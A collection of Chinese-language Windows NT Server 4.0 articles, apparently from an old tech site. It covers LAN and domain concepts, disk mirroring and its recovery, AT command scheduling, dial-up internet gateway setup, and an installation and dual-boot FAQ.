    从严格的定义来讲，局域网又分为局部区域网（LAN）和计算机交换机（CBX）两类，我们平时普遍应用的局域网是指局部区域网。计算机交换机是采用线路交换技术的局域网，目前仅在特殊应用环境下使用。网络的主要特点是实现系统软、硬件资源的共享，局域网的主要用途便是使网络上的许多用户共享高质量的打印机、大容量的存储设备，还允许网络上的用户之间进行有关信息的交换。这种共享可以大大地提高计算机的使用效率，将有助于扩大单机的应用范围，并尽可能地发挥高性能计算机的处理能力。同时，也为在不同计算机上对某一事务进行协调处理提供了必要的条件，有利于工作效率的提高。
    在谈到局域网时，我们不得不提一下多用户系统。广义地讲，局域网也是一个多用户系统，但它又不是“传统”意义上的多用户系统。因为:①传统的多用户系统，一般由中央处理机、几个联机终端和一个运行多用户的操作系统所组成，每个终端因没有CPU和RAM，所以一般不具有单独的数据处理能力，靠主机的CPU给终端用户分配资源及访问时间。与此相反，在局域网中每个用户使用的工作站都具有独立的处理能力，能够执行用户自己的应用系统;②两者在物理连接上也有区别。多用户系统的用户终端是通过独立的I/O串行口连到中心计算机上，而网络系统中的工作站是通过网卡与公用的通信线路相连，通信线路再通过HUB等外部设备与网络服务器相连;③局域网上的工作站都是智能型的工作站，用户程序的执行、数据处理都是在本地工作站上执行，不象多用户系统那样必须在中央处理机上进行处理。所以我们将局域网也称之为“分散处理系统”。

二、NT网络系统的组成和结构

    1.NT网络系统的组成
    NT网络的硬件系统由文件服务器、工作站和网络组件三部分组成。其中文件服务器是系统的核心，它是运行网络操作系统，为网络提供通信控制、管理和共享资源服务的计算机;工作站是指与服务器相连的、具有独立运行能力的、能够接受网络服务器的控制和管理并可共享网络资源的计算机;网络组件中主要有网卡、集线器（HUB）或交换机、通信电缆等设备。其中网卡安装在计算机中，负责连接计算机与通信电缆。集线器或交换机主要用于星型网络中对工作站的连接。通信电缆是网络组件中另一重要组成部分，它连接工作站、HUB和服务器等设备，提供信号传输时所需的传输介质。目前，局域网中常用的通信电缆有同轴电缆（又分粗缆和细缆两种）、双绞线和光纤三种。

2.NTS4.0对网络系统的要求
    NTS4.0对网络系统的要求主要是指对网络服务器、工作站及网络组件的要求。①对服务器的要求。NTS4.0支持多种类型的CPU，对于我们普遍使用的x86系列计算机而言，虽然微软要求的最低配置为Intel 80486/25，不过如果你的口袋里不是太寒酸，或不是非常情愿虐待自己的话，没有Pentium级的CPU就不要安装NTS4.0。对内存的最低要求是12MB，建议至少要有32MB以上的内存;完整安装NTS4.0系统所需的最小硬盘空间为117MB，建议配置1GB以上的大容量高速硬盘;②对工作站的要求。NetWare各版本对工作站硬件的要求较低，NT4.0对工作站的要求则由各工作站上运行的操作系统对硬件的要求而定。微软认为Intel 80386以上的PC都可以作为NT的工作站(NetWare工作站只需286以上的计算机就可以了)。如果你组建NT网的目的只是为了共享16位的DOS程序，那么使用386的工作站也无所谓，不过现在还有几个人“钟情”于DOS呢？甚至有人认为NT网络中工作站的配置应高于服务器配置才能真正发挥网络的作用。对于了解NT网络工作原理的读者，这一观点是不难被接受的。所以建议工作站的配置不应太低，最好也应在Pentium级以上;③对网络组件的要求。网络组件用于工作站与服务器之间的连接，并按实际的需要，组成不同结构、不同工作方式、不同速度的网络。因此，网络组件的选择要视网络的实际要求而定。有关NT网络中的硬件选择和配置可参见表1。

3.判断你的NT网络中是否需要专用的文件服务器
    根据网络中是否有专用文件服务器，局域网又可分为对等式（Peer-to-Peer）和主从式（Client/Server）两种形式。①对等网中不需要专用的文件服务器，每台计算机均可将自己的资源与其它计算机共享，而不必由某台特定计算机提供共享服务，也就是说对等网中计算机既是文件服务器，也是工作站。对等网能够提供灵活的共享模式，组网简单、方便，但难于管理，安全性能较差。它可满足一般数据传输的需要，所以一些小型单位在机算机数量较少时可选用对等网结构;②主从式网络中必须有一台高性能、高可靠性的计算机作为文件服务器，将其硬盘存储的信息和与其相连接的外设提供给网络上的其它计算机共享使用，是一种集中式的管理。主从式网络组网灵活，可扩充性好，并能实现高带宽信息的传输，是目前局域网的主要结构形式。但其建网成本较高，一般需要专业的人员来管理。因而，主从式结构的网络主要用于计算机设备数量较多、通信量较大和对网络的安全性要求较高的网络中。
    利用Windows NT 4.0组建对等式网络与使用Windows95组建对等式网络没有什么区别，而且组建后的网络功能将更强大。只是在这里有一点必须强调一下:并不是主从式网络中就不存在对等式的网络工作模式。在主从式网络中，当你的工作站安装有Windows NT4.0、Windows 95或Windows for Workgroups时，每个工作站都可以成为对等式的服务器。也就是说，当你从安装有Windows NT 4.0、Windows95或Windows for Workgroups的工作站登录服务器后，在工作站的“网上邻居”中所列出的对象不但有运行NTS4.0的强大服务器，也有身兼工作站的低级对等服务器。为提高主从式网络的速度和增强系统数据的安全性，建议在必要时禁止使用工作站操作系统所提供的对等网共享选项。这样一方面每个工作站不再担负服务器的功能，可以减少网络上信息的传输量;另一方面，不装入工作站操作系统的服务器部分还能节省工作站的内存。

4.常用的网络拓扑结构
    网络的拓扑结构是指网络中服务器与工作站之间的连接形式，常见的NT局域网主要使用总线型结构和星型结构两种拓扑形式。环型拓扑结构一般较少使用，在此不再讲述。
    ①总线型拓扑结构。在总线型拓扑结构中，文件服务器和工作站都连在一条公共的电缆线上，如图1所示。传输信息时，各工作站将带有目的地址的信息包发送到公用电缆上，并传输给与总线相连的所有工作站，各工作站再对网络上的信息包的地址进行检查，看是否与自己的站点地址相符，如相符，则接收该信息。
    总线结构使用的电缆一般为细同轴电缆。这种结构使用电缆较少，且容易安装（各工作站和文件服务器只需通过网卡上的BNC接头与总线上的BNC T型连接器相连即可）。注意，在总线主干两端必须安装终端电阻器。由于网上所有节点都共享一条电缆，在高通信量的网络环境中，传输电缆会成为网络的瓶颈，而且传输电缆一旦出现任何故障都会使整个网络瘫痪。因而这种结构只适用于连接设备较少（一般少于20台），且在较短距离内传输小容量信息的网络。总线型拓扑中可以存在对等式和主从式两种网络结构。
②星型拓扑结构。星型拓扑的网络有一个中央节点，网络的其它节点如工作站、服务器等都与中央节点直接相联，如图2所示。中央节点可以是文件服务器，也可以是无源或有源的连接器（如共享式HUB或交换机等）。我们一般使用共享式HUB或交换机作为中心节点。
    在星型拓扑网络中，由于各节点都用自己的电缆与中央节点相连，数据的传输不会在工作站到中央节点的线路上发生碰撞，这种系统也较容易扩充，并可实现多个中央节点的级联，是主从式网络所使用的主要拓扑形式。

三、Windows NT Server4.0的局域网功能

    NTS4.0作为Windows NT 4.0的服务器版本，它支持对称多处理器和多种类型的CPU，具有32位地址空间，提供了4GB（2GB+2GB）的最高内存容量，其中2GB供操作系统使用，另外2GB供应用程序运行;它拥有新一代文件管理系统--NTFS，使文件系统的稳定性、安全性和可靠性都得到了提高;同时，它继承了Windows 95的操作界面，支持多种传输协议，并与NetWare、Unix等多种网络兼容;而且对所有应用提供多线程、抢先多任务处理的支持，具有强大的通信和网络服务功能。下面，对照另一个主要的局域网操作系统NetWare，介绍NTS4.0在局域网中的一些特点。（关于什么是对称多处理器、多线程、抢先多任务处理，请看文章后的小知识）
    首先，在NT网中一次登录即可访问多个网络服务器。如果你的网络中有多个NTS服务器，而且你对这些服务器都有访问权限，那么你只需登录（LOGIN）一次，就可访问所有这些服务器上的资源。而NetWare3.x就没有此功能。因此，在NetWare3.x的网络上，你必须针对每个服务器都登录一次，才可访问每个服务器中的资源。同时，NT网的工作站还可实现同时登录NTS和NetWare两类服务器的功能。
    其次是内置的网络功能。通常的网络操作系统是在单机操作系统之上附加了网络管理模块。与此不同的是，NTS4.0网络操作系统将网络功能集成到了操作系统中，并将其作为系统中输入/输出系统的一部分，不再是把网络功能看作是操作系统的一个附加层。
    其三，NTS4.0中文版具有与Windows 95相同的图形用户界面，且在网络的组建和维护、资源的共享与管理等方面都非常简单、直观。它既可作为网络操作系统，也可作为单机操作系统。在作为网络操作系统时，服务器不仅对整个网络进行着控制和管理，同时还可在服务器自身操作平台上运行如Office97、3DMAX等应用软件，避免了NetWare文件服务器工作时不能另有他用的遗憾。NTS4.0还内置了目前各种网络系统的传输协议，增添了许多网络互连所需的相关功能，可方便地实现与DOS、Windows 95、Unix及NetWare等不同操作系统的互联。
    前文已提到，主从式NT网络中，在安装有Windows NT、Windows 95及Windows for Workgroups的工作站之间会存在点到点的对等式通信，这些工作站可以通过不同的登录方式来选择不同的共享对象。即使是仅选择了登录到域服务器，各工作站也可能存在对等式的通信。这种“复合型网络”的存在，当然有它的不好的一面（前文已谈到），但却方便了各工作站之间信息的直接交换，而且当工作站间进行通信时，很少或根本不再去访问域服务器，通信速度的快慢基本上由工作站的性能所决定。这就是在NT网络中有时工作站的配置高于专用服务器的一个原因。利用主从式结构中的对等式通信，有时可以提高各工作站的通信能力。例如，在组建游戏网络时，利用主从式结构中点对点的通信，其收效要比单纯的对等网好。

四、Windows NT的一些主要概念

    为了充分有效地利用Windows NT组网，首先要对其中的有关术语、概念有所了解。以下将介绍Windows NT的一些基本知识。
1.什么是NTDS
    NTDS的全名为“Windows NT Directory Service”（Windows NT的目录服务）。现今的网络操作系统大都是利用一个称为“Directory”（目录）的数据库来保存用户、组及安全设置等方面的信息。NTDS则是一个符合现代网络要求的目录服务，它使网络的管理与使用更简便。
    NTDS具有以下的特点:①目录数据库。NTDS建立在一个安全的目录数据库下，此数据库中保存着用户的ID、密码、访问权限等数据;②分散式的结构。为保证网络系统的安全，你可以设置自动地将NTDS的目录数据库备份到其他的计算机中;③单一登录(Single Logon)。不论网络上有多少台服务器，用户只要登录一次，就可以访问网络上所有被赋权限的服务器上的资源;④可实现在网络上任何一个地方管理网络。利用NTDS网络管理员可以在网络上的任何地方的任何一台工作站上来管理网络，如添加新用户、设置使用权限等;⑤建立与异构网络的互连。用NTDS可以管理在NetWare服务器上的帐号,NTDS也可以在UNIX的主机上运行。
    此外，Novell公司从NetWare4.11开始使用的NDS（Novell的目录服务）也是一个功能十分强大的跨平台网络目录服务结构，有兴趣的读者也可在有关书籍、杂志上了解一下有关NDS的知识，对你全面掌握网络的目录服务将会有所帮助。

2.什么是工作组
    工作组(Workgroups)是一个由同一局域网连接在一起的用户组成的小组。工作组中用户的资源与管理是分散在网络中各用户所在的计算机上的，并不一定都需要由特定服务器来提供文件与打印共享等服务。但是，工作组中的用户可以在这个网络上具有一些特殊的权限，如对文件服务或一些特殊应用的访问等。工作组扩大了网络可共享的资源，但如果一个工作组内的计算机数量太多时，就容易造成网络杂乱无章，不便于管理。

3.什么是域
    NetWare网络中的管理单位是“卷”，而NT网络中的管理单位则是“域（Domain）”，卷与域在功能上很类似。例如，一个单位下属有财务处、总务处、工会等部门，那么这个单位就相当于一个域，同时财务处、总务处、工会等部门也各是一个域，只是这些部门域都属于单位域的范围之内。类似的，NT网络中的域也具有这种层次性，如一个局域网中有100个用户，根据不同的用途，这100个用户又可分成4个组，每个组有25个用户。这时，可以用域的形式来管理这个网络。首先将这个局域网定义成一个大的域，再将4个用户小组分别定义成4个小的域，并且4个小域全部在一个大域的管理之下。所以我们可以将域定义为“安全与集中管理的最基本单位”。一个域中可包含一个或多个NTS服务器，而一个NT网络中可由多个域所组成。
    上面所提到的工作组与现在所介绍的域在网络结构上很相似，只是表现模式不同而已。工作组是将数量不多的计算机连成一个可互相共享资源的网络，在这种工作方式下，信息的安全保护只能靠给共享信息设置密码或将使用权限设置给特定用户来实现;域则是采用域控制器来进行信息管理的，每个用户都有自己的帐号和密码，并可根据不同的情况赋予不同的使用权限，这种方式不但使网络信息的安全得到了非常好的保障，同时很好地满足了大型网络的要求。

4.NT网络中用户的分类
    NT网络中的用户可分为以下的三类:①用户（普通用户或一般用户）。只享有一般使用权限的普通用户，它可被系统管理员管理;②用户组。由具有相同使用权限的用户组成的一个组，可通过改变用户组的权限来统一改变用户组内所有用户的权限。因此，建立用户组可方便地对用户进行分类管理;③系统管理员（administrator）。类似于NetWare网络中的“Supervisor”。它是安装NTS后，系统自动产生的管理员帐号。系统管理员对网络具有最高的管理权限，包括增加新用户、删除已有的用户、给用户设置权限、管理文件系统等。

5.什么是用户帐号
    如果某一用户要想登录到NT网络上，那么这个用户必须有一个帐号名称，这个帐号名称便是用户帐号（User Account）。每一个用户帐号中包含着用户的名称、密码、用户权力、访问权限等数据。NT网络中的用户帐号类似于我们在银行存钱时，银行操作人员给我们所设立的储蓄帐号。
    用户帐号可分为全局帐号（Global Account）和本地帐号（Local Account）两种。全局帐号是指在NT网络的域中建立用户时所使用的帐号，我们平时所建立和使用的帐号一般都是全局帐号，当在NT网中新建一个帐号时，NTS服务器将会自动设为全局帐号。NT网络提供了两个内置的全局帐号，一个是“administrator”，另一个是“guest”。guest主要供临时想登录域、但又没有帐号的用户暂时使用。如果你的网络中除了NTS外，还有NetWare等其他操作系统，那么这些网络操作系统与NTS网络之间，可以通过建立本地帐号作为通信的桥梁，所以本地帐号一般用于具有两种以上不同类型操作系统的网络中。

6.NTS网络中服务器的分类
    在域管理模式下，NTS服务器可分为三种:①主域控制器（PDC）。由域内一台安装有NTS的计算机担任，由它来管理域内所有用户帐号及使用权限，域上所有的用户帐号、组以及安全设置等数据都保存在PDC中。一个域必须有、而且只能有一个PDC，当你第一次安装NTS4.0，且网络中只有一台服务器时，必须将这台服务器设置为PDC;②备份域控制器（BDC）。由于PDC控制该域中的所有用户帐号及使用权限，为防止因为PDC出现故障而造成系统瘫痪，可在域中再添加一台安装有NTS的计算机，并将其设置成为BDC。当PDC出现故障时，BDC将转变为PDC，维持网络的正常运行;③一般服务器（Server）。对于安装NTS的计算机，有时我们并不需要将它设置为域控制器，但也不想浪费NTS本身的资源，这时可将它设置为一般服务器。
    安装NTS时，可以确定该服务器是以域控制器运行，还是以一般服务器方式运行，安装结束后不能再更改。

7.通信协议
    通信协议可简单地理解为网络中通信各方事先约定的通信规则的集合。通信协议是分层的，因而在一个网络中可以同时运行多种通信协议。NT网络中常用的通信协议主要有以下几种:①NetBEUI协议。NetBEUI是Windows NT支持的最基本的、也是在局域网中运行速度较快的一个通信协议。它体积小，效率高，特别适用于小型的网络。安装Windows NT时，要安装该通信协议;②NWLink协议。NWLink是与目前局域网中广泛采用的NetWare操作系统所使用的IPX/SPX兼容的协议。如果在NT网络上要访问NetWare网络系统的资源，必须安装NWLink通信协议;③TCP/IP协议。TCP/IP是目前最完整且被普遍接受的通信协议标准。它可以让使用不同硬件结构、不同操作系统的计算机之间相互进行通信，如UNIX与Windows NT之间的通信。TCP/IP协议目前已发展为Internet的标准。
还有一些关于Windows NT的网络概念或名词介绍，在此不可能全部罗列出来，当在后面的应用中涉及到时再随时介绍。

返回


NT SERVER 如何做镜像

《一键清理系统垃圾》

NT SERVER 如何做镜像

happy：NT如何做镜像？

netgo：
1.disk duplexing
要两块硬盘控制卡和两块硬盘
2.只要有两块硬盘

在磁盘管理器中选中区域->容错->建立镜像, 磁盘分区->立即更改, 重起
(第二块硬盘空闲空间要比第一块大)

happy ：
我的理解对不对？
1.主硬盘的内容先改变，然后镜像硬盘的数据随后改变。
2.主硬盘出现故障（包括软件故障），镜像硬盘的数据自动
修复主硬盘的数据。
3.主硬盘和镜像硬盘的数据是完全相同的
4.如果包含SQL系统，由于数据库很大，效率是不是很低？
5.仅仅建立网站，有必要建立镜像硬盘吗？

很不成熟 ：
主盘与镜像盘并非时时刻刻保持同步，而且主盘与镜像盘的角色是可以变换的，这主要依据于关机的时间。如果拔下主盘，用镜像盘引导，关机；然后再插上原来的主盘，重新引导。此时，引导系统的就是原来的镜像盘，而不是主盘。
通常，关机时，两块盘会强行同步。故做镜像的机器会遇到关机过程缓慢的现象。

返回


NT Server的AT命令详解

《一键清理系统垃圾》

NT Server的AT命令详解

Windows NT Server的服务程序管理器只能设置某项服务的启动方式（自动、手动、失效），而在日常管理工作中，常常要求某项服务能定时开启、关闭。Windows NT Server提供的AT命令能够实现这一点。利用它可实现RAS服务定时开关，其具体步骤如下：

    1.在“设置”“控制面板”“服务”中启动Schedule服务，并将其启动方式属性设置为自动。

    2.在命令窗口中使用AT命令设置服务程序的定时启动关闭。

    AT命令的格式如下：

    AT [\\computername] time [/interactive] [/every:date[,]|next:date[,]] ″command″

    参数含义：

    无参数：显示所有已设置的计划命令情况。

    \\computername：指示执行该命令的计算机名，如省略则在本机执行。

    time：命令执行时间

    /interactive：当程序执行时是否与正在登录的用户进行交互。

    /every:date[,]：指定程序执行的日期（如每周二、三：/every:T,W）,每月1，2号：/every:1,2)。

    next:date[,]：指定程序下一次执行的日期。

    ″command″：定时执行的Windows NT命令，程序，批处理。

    AT [\\computername] [[id][/delete][/yes]]

    参数含义：

    id：分配给计划命令的识别号码，可由不带参数的AT命令查到。

    /delete：取消指定的计划命令，如果id省略的话，取消所有的计划命令。

    /yes：强制对所有的取消询问回答yes。

    如每日19：00启动，次日7：30关闭RAS服务的命令如下：

    AT 19:00 /every:M,T,W,Th,F,S,Su net start ″remote access server″

    AT 7:30 /every:M,T,W,Th,F,S,Su net stop ″remote access server″

返回


NT Server用作 Internet的网关

《一键清理系统垃圾》

NT Server用作 Internet的网关

[该文章的方法不一定可行，请读者自己实践后再做结论]
---- 假如你是一个网络管理员，你所负责的是一小型企业的 NT网络环境，在“上网”已成潮流的今天，你可能会遇到把你的 Intranet连上 Internet这个问题。本文将对如何建立本地通信与 Internet路由提供一个解决方案。

---- 运行 NT Server 4.0的计算机不仅能用作 LAN/LAN的路由器，还能充当 Internet的网关。现在你唯一需要的是一根电话线，一只 Modem和一个 ISP提供的 PPP帐号，余下的只是配置服务器的工作了。配置服务器的步骤如下：

一.在 NT Server上安装 Modem并连通电话线

---- 启动 NT Server 4.0登录后在 Start菜单选中 Setting单击，打开 Control Panel,双击 Modem图标会出现 Install New Modem Wizard向导。这时，用户有两种选择，一种是手工设定 Modem，另一种是让 NT搜索一个。由于自动搜索要花一定的时间而结果有时又不准确，本人建议以手工设定 Modem为好。复选 Don't Detect...然后单击 Next。这时你会看到 Install New Modem窗口，将 modem的驱动盘插入，输入到达该磁盘的路径，单击 Next，NT将搜索磁盘寻找与 NT兼容的 modem驱动程序并显示一个它所找到的驱动程序列表。请突出显示你要安装的驱动程序并单击 OK 以安装驱动程序。在下一窗口选择 Modem 的连接 port，单击 Next，这时出现最后一屏，单击 Finish结束安装。安装完后还需对 port的速率等进行设置，在此就不赘述了。

二.检查网卡的原静态 IP地址，放弃缺省网关

---- 打开 Control Panel，双击 Network图标后出现 Network属性工作表。双击 TCP/IP Protocol表项打开 Microsoft TCP/IP Properties窗口，检查一下 Default Gateway栏，请不要填入任何 IP地址。

三.安装RAS

---- 打开 Control Panel，双击 Network图标，选择 Service Properties标签,打开 Service Properties工作表，单击 Add后出现一下拉列表，其中列出了可以增加到 Windows NT中的软件服务程序。选定 Remote Access Service项，单击 Continue按钮，RAS文件被拷贝到硬盘后出现 Remote Access Setup窗口，需对COM口进行设置，单击 Configure按钮，在 Port Usage栏中可选择 1. Dial out only; 2. Receive calls only; 3.Dial out and Receive Calls选择 3后单击 OK返回 Remote Access Setup窗口，单击 Continue后出现 RAS Server TCP/IP Configuration窗口，复选 Use DHCP to assign remote TCP/IP Client address后单击 OK，重启计算机完成 RAS的安装。

四．建立与 ISP的连接，设置连接中禁止 Use remote gateway

---- 双击桌面上的 My Computer图标，找到 Dial-Up Networking项双击，出现 Dial-Up Networking对话框，显示 New Phonebook Entry Wizard,在 Name the new phonebook entry栏中填入你想要编辑的拨号名称，一般为了方便，我用的是 ISP的 IP地址。单击 Next后出现 Dial-Up Networking对话框，该对话框显示以下项目：

       . Phonebook Entry to Dial
       . Phone number preview
       . Dialing from

---- 你会在 Phonebook Entry to Dial栏中看到你已编辑的名称，在 Phone number preview栏中看到你所要拨的电话号码，单击 More按钮，出现一菜单，选择 Edit entry and modem properties,单击后出现 Edit Phonebook Entry窗口，选择 Server栏单击，出现 Network protocol栏，复选 TCP/IP协议，单击 TCP/IP Settings...按钮后出现 PPP TCP/IP Settings窗口，复选 Server assign IP address和 Specify name server address ,千万不要复选 Use default gateway on the network,切记！在 Primary DNS和 Secondary DNS栏中填入与 ISP相对应的 IP地址，单击 OK后返回 Edit Phonebook Entry窗口。选择 Script按钮单击后在 After dialing(login)栏中复选 Pop up a terminal Window单击 OK返回 Dial-Up Networking窗口，单击 Close,关闭窗口返回桌面。

五．修改注册表（Registry）

---- 在注册表HKEY_LOCAL_MACHINE\System\CurrentControlSet\ Service\RASArp\Parameters键，生成 DWORD型新值项 Disable OtherScrPackets,其值为 0。说明：在传递 IP分组时路由器不再改变源 IP地址。

六．拨号到 ISP，登录后找到 ISP分配的 IP地址

七．添加路由---- 在命令状态输入：route add 0.0.0.0 mask 0.0.0.0 w.x.y.z metric2

---- 其中 w.x.y.z即为刚找到的 ISP分配的 IP地址。

八．启动工作站，修改 Default gateway地址

---- 工作站上的 Default gateway地址就是服务器网卡的静态 IP地址。这时你的工作站已经可以 Ping通外部世界，Intranet连上了 Internet,大功告成。

返回


NT磁盘镜像中断后的恢复

《一键清理系统垃圾》

NT磁盘镜像中断后的恢复

----很多高档服务器上，出现问题时采用硬件RAID1（磁盘镜像）的容错方式。如果长时间不注意，服务器运行也正常，会以为机器没有问题，其实打开磁盘管理器一看，发现镜像磁盘的状态为断开（BROKEN）。笔者手上的一台HP服务器就出现了这种情况。
----进入磁盘管理器，DISK0显示有两个分区，但无逻辑盘符，选中第一个分区，状态行显示ACTIVEPARTITION，第二个分区显示PARTITION；DISK1有两个分区，逻辑盘符分别是C：和D：，选中第一个分区，状态行显示MIRROR SET＃1（BROKEN），选取第二个分区状态行显示MIRROR SET＃3（BROKEN），这说明现在用的是DISK1，但引导信息在DISK0的第一个分区上。

重建镜像的方法：

1．中断原镜像关系：分别选中DISK1上的C和D，在容错选单中选择BREAK MIRROR。

2．激活DISK1上的分区C：使之能够引导系统。

3．关机，将两个硬盘互换。

4．重新开机，删除现在的DISK1上的两个分区（这时它们应分别显示出盘符E和F，注意不要将有盘符C和D的分区误删），使之成为空闲空间，因为建MIRROR必须是一个分区与一个空闲空间，两个分区之间不能建镜像。

5．选择现在的DISK0上的C分区，按CTRL单击DISK1上的空闲空间，在“容错”选单中选“建镜像（ENSTABLISHMIRROR）”，可看到两个黑框将分区C及空闲空间中大小相等的一部分框住。此时状态行显示：MIRROR SET＃1（NEW）。

6．根据提示关机重启，再进入磁盘管理后，状态行显示：MIRRORSET＃1（INITIALIZING），表示镜像工作正在进行，当状态行出现HEALTHY后说明镜像完成。这时DISK0与DISK1的相应区域都应显示盘符C及NTFSXXXMB的字样（XXX是数字，表示分区大小）。

7．如法炮制D盘。

8．如果镜像过程很长，并伴有硬盘的异响，HEALTHY始终不出现，说明硬盘有物理损坏，这一点可从WINDOWS NT中的“事件查看器”中得到证实。解决的办法是———快去换硬盘。

返回


NT使用中的若干常识

《一键清理系统垃圾》

NT使用中的若干常识

---- 问：NT必须被安装在C盘吗？

---- 答：不。NT可以被安装到任何驱动器，但是它的确在活动分区上放置一些引导NT的文件。

---- 问：安装过程中无法创建4GB以上的NTFS分区

---- 答：在NT安装基于文本的过程中，可以创造和格式化分区，NTFS分区的上限非常大（可为16exabytes），但是FAT分区的最大上限为4GB（DOS下为2GB）。如果在安装过程中就将分区格式化为FTFS格式，它首先将其格式化为FAT格式，然后在NT安装的最后阶段将其转换为NTFS格式，这样您就限制在安装中4GB分区大小的上限之中了。为了避免这一问题，有许多可以利用的方法。安装之前，将磁盘插入已安装好NT的机器上，使用磁盘管理器分区、格式化，再将其插回所要安装的计算机中。将磁盘分区成较小的分区，如果您有5GB的磁盘，您可以有1GB的系统分区和4GB的引导分区。系统分区是NT存放其核心启动文件的地方，oot.ini,ntldrandntdetect.com(如果使用SCSI则还有ntbootdd.sys)，通常设置为活动分区。引导分区是NT存放其它文件的地方，如：%systemroot%目录。在安装时创建一个4GB的分区，在安装完成之后扩展NTFS分区。

开启磁盘管理器（开始—程序—管理工具—磁盘管理工具）。

选择NTFS分区，按下Ctrl键，同时选择磁盘其它的未分区部分。

从分区目录中，选择扩展卷集（ExtendVolumeSet）。
---- 注意：您不能扩展引导区和系统区（因为引导区和系统区不能是卷集的部分）。

---- 如果您进行的是自动安装，则可以使用自动安装文件中的ExtendOEMPartition记来创建多于4GB的磁盘分区。这一标签是文本模式的安装将分区扩展，而WINDOWSNT临时资源从物理上来说被安置在磁盘上紧随其后的任何可用未分区空间上。在[unattended]部分中包括如下语句：

      FileSystem=convertNTFS ExtendOemPartition=1,NoWait NoWait选项只适用于ServicePack1或以上。

---- 而且，如果您使用分配套装安装，可将ServicePack版本的setupdd.sys复制到NT分配集中的I386目录。
---- 问：怎样创建NT安装盘？

---- 答：按如下操作：
---- 插入NTWorkstation/Server的光盘。
---- 从开始菜单中选择运行（或同时按WINDOWS键和R键）。
---- 如果您没有在制作磁盘的机器上运行NT，则键入

      :\i386\winnt/ox 如果您正运行NT，则键入 <cd-romdrive>
      :\i386\winnt32/ox 您必须插入三张空白格式化过的磁盘。
---- 问：什么是象征文件，它们有必要吗？
---- 答：象征文件是当映射被复制时生成的，被用来调试映射。它们允许使用正确的工具在软件运行时查看代码。除非您是程序员，您不会需要这些文件。

---- 问：怎么实现DOS和WindowsNT的双引导？

---- 答：最好的办法是至少创建两个分区。第一个分区为200MB左右，FAT格式，用来安装DOS。建议设定为200MB的原因是留了足够的空间由于日后根据需要安装WindowsforWorkgroups或Windows95。安装完DOS后来在另一个分区上安装NT，可采用FAT或NTFS的格式。安装完成后，系统启动时您需在DOS和NT间做出启动的选择。将NT安装到FAT格式的分区的优点是：如果出现问题，您可以用DOS启动计算机，再进入NT的分区，恢复文件，尽管NT的核心文件被安置在C：盘（boot.ini、ntdetect.com和ntldr）。

---- 问：文件\Support\Deptools\ \ROLLBACK.EXE是什么？

---- 答：该文件被开发者用来完全清除注册表。不要使用它！

---- 问：怎样安装NTServer?

---- 答：NTServer的安装同NTWorkstation的安装一样，只有如下例外：
---- 您须选择NTServer、Server、PDC或BDC。一经设定就不能更改。
---- 有安装InternetInformationServer的选择。
---- 选择一种许可模式，每服务器或每客户。

---- 问：怎么在已安装的NT上安装DOS?

---- 答：按以下步骤进行：
---- 创建紧急修复盘(rdisk-更新修复信息)。
---- 确定您有NT安装盘（可以通过WINNT32/OX来制作）。
---- 重新启动机器，用MS-DOS启动盘启动系统。
---- 安装DOS（与从一张启动盘运行SYSA：C：一样）。
---- 机器将重新启动至DOS。
---- 用NT安装盘重新启动计算机。
---- 插入第二张盘后按R进行修复。
---- 只选中InspectBootSector，继续。
---- 按回车检测硬件，插入第三张盘。
---- 过程询问您是否有紧急修复盘（ERD），选择有（YES），并插入紧急修复盘。
---- 系统便重新启动到NT。
---- 在NT中进入DOS提示符。
---- 键入attribc:\boot.ini-r-s
---- 编辑boot.ini，在底部加入c:\=“MS-DOS”。
---- 键入attribc:\boot.ini+r+s
---- 重新启动计算机，您便拥有MS-DOS和NT的选择功能！很简单:-)
---- 只当C：驱动器为FAT格式时以上方法有效。

---- 问：怎样从NTFS分区中删除NT？

---- 答：最好的方法是删除分区。用NT安装盘引导计算机，出现创建/删除分区时，选择NT所在的NTFS分区，按D来删除分区。然后按L来确认。

---- 问：可以用磁盘复制（DiskDuplication）来分发WindowsNT吗?

---- 答：可以用磁盘复制来安装WINDOWSNT，但不能进行完全安装。按如下方法操作：
---- 在机器上使用winnt/b功能。第二次重新启动时停止，此时系统完成了安装的文本部分而正将开始GUI部分。
---- 拆除复制机器的硬盘。将复制盘安装到新机器上。开启新机器，GUI部分便自动运行了。克隆时的传统问题是SID会被复制，然而现在有许多第三方产品，允许您更改一台复制计算机的SID，然后您需要在PDC上为机器添加新的计算机帐号，并更改它的名称。

---- 问：怎样从FAT分区中删除NT？

---- 答：如果将NT安装在FAT格式的分区中，则可以删除NT操作系统和NTbootloader。用复制有DELTREE工具的MS-DOS启动盘启动计算机，如下操作：

      C: DELTREE WINNT CD PROGRA~1 DELTREE WINDOW~1 CD\ DEL NTLDR. DEL
      NTDETECT.COM DEL BOOT.INI DEL PAGEFILE.SYS (由于您的设置此文件可能不在活动分区)
      DEL BOOTSECT.DOS 用Win95或DOS启动盘启动计算机，键入SYS a: c:
      重启计算机。
---- 问：怎样将工作站（NTWorkstation）转化为服务器（NTServer）?
---- 答：改变2个注册表键值，并依次改变一些其它的键值，从而可以将工作站更改为服务器，有许多关于这方面的讨论，但是这违反了许可协议，不应该尝试。工作站可以被升级为服务器，但不能成为PDC或BDC，实现更改需重新安装NT服务器。按下列方法转换：用NT安装盘启动计算机（用WINNT（32）/OX的方法创建启动盘）。

---- 按回车安装NT。按回车检测硬件。按回车继续（或按S，如果有特殊的驱动器）。接受许可协议（按PAGEDOWS，然后按F8）。NT安装程序将检测到存在工作站，询问是否您希望升级。按回车。系统提示是否将工作站升级成服务器，按回车。和平常一样继续。所有的工作站配件（网络、打印等）将被转换成服务器。完成后您就拥有了NT服务器，并保留所有原有的程序和组。如果您曾使用ServeicePack更新过工作站，则有必要用同样的ServeicePack使用FAQ中所提到的自动安装更新服务器，否则您将面临许多不可预知的问题，甚至导致内核崩溃。

---- 问：怎样在NT上安装Windows95?

---- 答：如果您已经安装了DOS，就用DOS启动，再安装WINDOWS95。如下的方法适用于您只安装了NT的情况。创建紧急修复盘（rdisk-更新修复信息）。保证您拥有NT的安装盘（可以用winnt32/ox制作）。重新启动计算机，用的WINDOWS95安装盘或支持光驱的启动盘启动系统，从光盘中运行SETUP.EXE。和往常一样安装WINDOWS95。WINDOWS95安装完后，重新启动计算机，用NT的安装盘引导系统。第二张盘提示选项时，按R键来修复。

---- 除去所有选项的选择，只保留“InspectBootSector”，继续。按回车检测硬件，插入第三张盘。程序会询问是否有紧急修复盘（ERD），回答是，并插入紧急修复盘。计算机将重新引导入NT。在NT中进入DOS模式。

---- 键入attribc:\boot.ini-r-s
